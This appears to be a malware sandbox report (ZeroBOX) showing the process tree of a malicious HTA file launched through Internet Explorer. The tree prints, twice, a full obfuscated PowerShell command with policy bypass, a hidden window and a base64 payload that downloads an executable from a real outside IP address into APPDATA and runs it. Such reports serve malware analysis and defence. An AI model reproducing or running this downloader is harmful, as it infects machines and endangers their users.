| ZeroBOX

iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" C:\Users\test22\AppData\Local\Temp\IEnetcache.hta.html
3064
- iexplore.exe "C:\Program Files\Internet Explorer\iexplore.exe" SCODEF:3064 CREDAT:145409
  1376
  - cmd.exe "C:\Windows\system32\cmd.exe" "/C POWerSHElL -EX ByPASS -NOp -W 1 -c dEvIceCrEDENtIALDEPLoYmeNt ; iEx($(ieX('[System.TexT.EncOdInG]'+[CHaR]58+[CHAr]58+'UTf8.GETsTRInG([SySteM.conVErt]'+[cHAr]0X3A+[chAR]58+'froMbasE64sTRiNG('+[CHAR]0X22+'JG8wOVNaYiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZXJEZUZJTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElpU1Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtCcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb29PTE95Q0wsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZd2N2ZEVGWldDLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKcmRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJhUUFrbXpIRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzVEhRRm56RnpmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG8wOVNaYjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNC4xNzkvNTE1L3dpbml0aS5leGUiLCIkRU52OkFQUERBVEFcd2luaXRpLmV4ZSIsMCwwKTtTVGFyVC1zTGVFcCgzKTtzVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdpbml0aS5leGUi'+[chAR]34+'))')))"
    568
    - powershell.exe POWerSHElL -EX ByPASS -NOp -W 1 -c dEvIceCrEDENtIALDEPLoYmeNt ; iEx($(ieX('[System.TexT.EncOdInG]'+[CHaR]58+[CHAr]58+'UTf8.GETsTRInG([SySteM.conVErt]'+[cHAr]0X3A+[chAR]58+'froMbasE64sTRiNG('+[CHAR]0X22+'JG8wOVNaYiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFkZC10eVBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZXJEZUZJTklUSU9OICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVcmxNT24iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIElpU1Msc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEtCcCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgb29PTE95Q0wsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBZd2N2ZEVGWldDLEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBKcmRPKTsnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYU1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJhUUFrbXpIRSIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWVTUEFjRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBzVEhRRm56RnpmICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJG8wOVNaYjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzIuNC4xNzkvNTE1L3dpbml0aS5leGUiLCIkRU52OkFQUERBVEFcd2luaXRpLmV4ZSIsMCwwKTtTVGFyVC1zTGVFcCgzKTtzVGFSdCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJEVOVjpBUFBEQVRBXHdpbml0aS5leGUi'+[chAR]34+'))')))"
      2336
      - csc.exe "C:\Windows\Microsoft.NET\Framework64\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\test22\AppData\Local\Temp\ac3xdhob.cmdline"
        2472
        
        cvtres.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\test22\AppData\Local\Temp\RES41A4.tmp" "c:\Users\test22\AppData\Local\Temp\CSC4135.tmp"
        3012

No process loaded Click on a process in the tree above to load its data.

PID
Parent PID

default registry file network process services synchronisation iexplore office pdf

Behavioral Analysis

Process tree

Process contents